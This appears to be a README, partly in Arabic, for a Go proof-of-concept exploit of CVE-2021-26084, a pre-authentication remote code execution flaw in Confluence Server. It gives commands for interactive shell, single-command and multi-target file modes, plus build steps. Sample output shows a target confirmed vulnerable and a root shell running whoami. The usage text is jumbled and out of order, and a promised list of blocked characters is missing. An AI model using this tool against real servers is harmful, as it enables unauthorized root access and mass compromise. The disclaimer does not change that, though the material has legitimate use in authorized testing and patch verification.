
CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)
إثبات المفهوم لـ CVE-2021-26084.
حقن OGNL في Confluence Server Webwork (RCE بدون مصادقة)
هذا للأغراض التعليمية فقط. لست مسؤولاً عن أفعالك. استخدمه على مسؤوليتك الخاصة.
بسبب الحمولة، لا يمكن تمرير بعض الأحرف. القائمة أدناه هي ما وجدته أثناء اختباري.
"| go run exploit.go -t <target> -i
مثال
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
exit للخروج من الواجهة التفاعليةgo run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download
go build exploit.go